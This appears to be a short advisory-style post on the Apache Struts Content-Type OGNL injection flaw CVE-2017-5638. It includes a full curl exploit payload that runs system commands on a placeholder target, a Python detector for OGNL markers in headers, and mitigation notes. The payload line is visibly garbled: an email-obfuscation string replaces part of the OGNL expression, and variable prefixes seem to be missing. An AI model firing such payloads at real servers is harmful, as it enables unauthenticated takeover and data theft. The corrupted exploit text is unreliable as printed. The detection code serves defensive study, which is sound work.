Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

How the mentioned CVE works:

CVE-2017-5638 resides in the Jakarta Multipart parser of Apache Struts. The exploit works by sending a maliciously crafted `Content-Type` HTTP header within a file upload request. The parser fails to process this header, and its error handling uses the submitted `Content-Type` value to construct an error message without sanitizing it. As a result, the user-supplied header string is passed directly into the OGNL expression evaluation engine, which evaluates attacker-controlled OGNL expressions. Because OGNL expressions can execute arbitrary system commands, an unauthenticated attacker can achieve full Remote Code Execution on the target server by injecting commands directly into the header.

Platform: Apache Struts
Version: 2.3.5 – 2.3.31

Vulnerability: Remote Code Execution

Severity: Critical

Date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='whoami').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target.com/upload.action

How the exploit works:

Malicious HTTP request.

OGNL expression injection.

Arbitrary command execution.

Protection from this CVE

Apply Struts patch.

Upgrade Struts version.

Use restrictive firewall rules.
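
A detection check to run alongside the mitigations above, as an added example that is not part of the original post: it flags requests whose `Content-Type` carries an OGNL delimiter (`%{` or `${`) or does not parse as a media type at all. The function names and sample requests are constructed for illustration, and the injected value is an inert placeholder.

```python
import re

# RFC 7230 "token" characters; { } ( ) @ are not legal in a token, so an
# OGNL expression can never pass as a well-formed media type.
TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
PARAM = r"\s*;\s*" + TOKEN + r'=(?:' + TOKEN + r'|"[^"\\]*")'
MEDIA_TYPE = re.compile("^" + TOKEN + "/" + TOKEN + "(?:" + PARAM + r")*\s*$")
# Struts evaluates text wrapped in %{...} or ${...} as OGNL.
OGNL_MARKER = re.compile(r"[%$]\{")

def content_types(raw_request):
    """Return every Content-Type value found in a raw HTTP request head."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    values = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "content-type":  # case-insensitive
            values.append(value.strip())
    return values

def classify(raw_request):
    """Return 'ok', 'no-content-type', 'ognl-marker' or 'malformed'."""
    values = content_types(raw_request)
    if not values:
        return "no-content-type"
    if any(OGNL_MARKER.search(v) for v in values):
        return "ognl-marker"
    # Duplicate headers or values outside the media-type grammar are suspect.
    if len(values) > 1 or not all(MEDIA_TYPE.match(v) for v in values):
        return "malformed"
    return "ok"

def scan(requests):
    """Return (index, verdict) for every request that deserves a closer look."""
    verdicts = enumerate(classify(r) for r in requests)
    return [(i, v) for i, v in verdicts if v in ("ognl-marker", "malformed")]

# Constructed sample requests (not captured traffic).
SAMPLES = [
    "POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: multipart/form-data; boundary=----FormBoundary7MA4YWxk\r\n\r\n",
    "POST /api HTTP/1.1\r\nHost: app.example\r\n"
    "content-type: application/json; charset=utf-8\r\n\r\n{}",
    "POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: %{(#placeholder='multipart/form-data')}\r\n\r\n",
    "POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: multipart/form-data boundary\r\n\r\n",
    "GET /index.action HTTP/1.1\r\nHost: app.example\r\n\r\n",
]

if __name__ == "__main__":
    for index, verdict in scan(SAMPLES):
        print(f"request {index}: {verdict}")
```

The same two patterns can be applied to proxy or WAF logs that record request headers; a hit on a host running Struts 2.3.5 – 2.3.31 is worth treating as a possible compromise, not just a blocked probe.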

Impact:

Complete system compromise.

Data theft.

Service disruption.

Sources:

Reported By: nvd.nist.gov